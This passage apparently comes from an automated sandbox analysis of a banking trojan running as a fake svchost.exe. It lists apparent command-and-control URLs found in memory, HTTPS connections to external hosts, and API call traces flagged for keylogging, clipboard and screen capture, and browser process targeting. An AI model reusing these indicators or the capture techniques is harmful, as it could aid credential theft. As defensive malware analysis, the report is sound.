00000002.00000003.1598041021.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533903269.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.000000000945C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
Source: svchost.exe, 00000002.00000003.1487581864.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677583286.000000000D6D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482360119.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790368488.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741910856.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1701402792.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795820194.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2018252003.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1685028847.0000000008BD3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498623748.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489496514.0000000002FDD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722340000.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710622766.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741405663.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2017371048.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1860400618.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1771101658.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1486859867.0000000008B1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/login.php
Source: svchost.exe, 00000002.00000003.2034139973.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1961980550.0000000008B31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741910856.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1701402792.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795820194.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904192190.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085122361.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741405663.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808484728.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2129347046.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793839467.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1803590618.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804281709.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130554796.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702085339.0000000008B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885635584.0000000008B30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1912940581.0000000008B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/wp-json/
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656512488.000000000D637000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433099437.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1627091175.000000000D6C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433689481.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1612478591.000000000D6E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616909497.000000000D6DD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411221311.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615107618.0000000008A5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1612474872.000000000D638000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615795010.0000000008BD3000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1934543116.00000000089D0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001A.00000002.2109919252.00000000086FA000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.1932747230.0000000000DB1000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.1932747230.0000000000DD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://puzylyp.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://puzylyp.com/login.phpl
Source: svchost.exe, 00000002.00000003.1433691652.0000000008ABC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617460331.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2076688408.0000000009490000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2053422068.0000000008D85000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/
Source: svchost.exe, 00000002.00000003.1433691652.0000000008ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/Pr
Source: svchost.exe, 00000002.00000003.1615659862.0000000008A57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1875058594.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616788232.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617691262.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716727400.0000000008B11000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432764888.0000000008B0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616482741.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402224953.0000000008B30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655421529.000000000D63C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633102508.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433099437.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613886596.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2120851467.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1427698654.0000000008A3A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889505054.0000000008B11000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482651296.0000000008B14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633062384.0000000008B11000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613896915.0000000000865000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433689481.0000000002F36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/login.php
Source: unknownNetwork traffic detected: HTTP traffic on port 56876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54978
Source: unknownNetwork traffic detected: HTTP traffic on port 54964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56896
Source: unknownNetwork traffic detected: HTTP traffic on port 56880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56880
Source: unknownNetwork traffic detected: HTTP traffic on port 56942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62633 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62632
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62633
Source: unknownNetwork traffic detected: HTTP traffic on port 54965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54965
Source: unknownNetwork traffic detected: HTTP traffic on port 55020 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56920
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55002
Source: unknownNetwork traffic detected: HTTP traffic on port 56920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62632 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54978 -> 443
Source: unknownHTTPS traffic detected: 99.83.170.3:443 -> 192.168.2.9:56876 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:56880 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:56896 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:56920 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:56942 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:54965 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:54978 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:55002 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:55020 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Contains functionality to capture and log keystrokes
Source: C:\Windows\apppatch\svchost.exeCode function: [tab]2_2_02652F40
Source: C:\Windows\apppatch\svchost.exeCode function: [del]2_2_02652F40
Source: C:\Windows\apppatch\svchost.exeCode function: [del]2_2_02652F40
Source: C:\Windows\apppatch\svchost.exeCode function: [ins]2_2_02652F40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02653220 memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock,GlobalUnlock,2_2_02653220
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02649530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_02649530
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01329530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_01329530
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013E9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_013E9530
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01519530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_01519530
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_026654A0 Sleep,_snprintf,GetDesktopWindow,GetWindowDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,ReleaseDC,2_2_026654A0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02652F40 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii,2_2_02652F40

E-Banking Fraud

barindex
Checks if browser processes are running
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_026578A0
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_026578A0
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_026578A0
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02656CA0
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe2_2_02656CA0
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe2_2_02656CA0
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe2_2_02656CA0
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02656CA0
